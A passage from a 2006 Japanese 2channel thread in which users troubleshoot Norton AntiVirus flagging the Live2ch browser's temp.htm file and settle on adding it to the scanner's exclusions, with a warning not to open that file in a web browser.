542 名前:538 [2006/05/24(水) 03:34:43 ID:uOt5d8a9] >>540 レスありがとうございます。 ログフォルダの指定は合っていました。 ウィルスの検出場所は、Live2ch\temp.htm、という所です。 このHTMLファイルをNAVの除外に設定すればいいんですかね? それとも止めといたほうがいいですか?(このファイルを削除しても意味無しですよね) よろしければレスお願いします。 >>541 ID隠して騙りは止めてね
543 名前:538 [2006/05/24(水) 03:39:57 ID:uOt5d8a9] >>540 言い忘れました、ちなみに Live2ch\temp.htmはログフォルダの外にあるファイルです。
544 名前:ぴーこ名無しさん mailto:sage [2006/05/24(水) 04:07:14 ID:???] >>542-543 こちらでも確認しました。 Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。 temp.htmを除外に加えたら正常に表示されました。 注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。 また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや お使いの2ちゃんねるブラウザのスレを見るようにしてください。
545 名前:ぴーこ名無しさん mailto:sage [2006/05/24(水) 04:18:41 ID:???] >>544 追記 Live2chのfaqが過去ログにありました。>>84 orz....... 参考に pc7.2ch.net/test/read.cgi/software/1141544659/484-n dat落ち ttp://220.254.5.211:8000/2ch/pc7_software/1141/1141544659.html#484 ミラー
546 名前:538 [2006/05/24(水) 04:40:48 ID:uOt5d8a9] >>545 わざわざ再現までしていただき(しかもこんな夜中に)すみません。。。 temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。 ありがとうございます! しかも、過去ログまで探してくれたんですね、、、ありがとうございます。
547 名前:ひよこ名無しさん mailto:sage [2006/05/24(水) 04:47:04 ID:???] >>546 俺も暇だからよー
548 名前:ひよこ名無しさん mailto:sage [2006/05/24(水) 13:46:43 ID:???] >>546 俺も暇だからよー
549 名前:cen ◆Am9xOgNMYE mailto:sage [2006/05/30(火) 02:32:01 ID:??? BE:137160162- ] こんばんは。 >>17 のソフトですが、対応するスクリプトを増やしました。 それから、検索の途中で中止できるようにしました。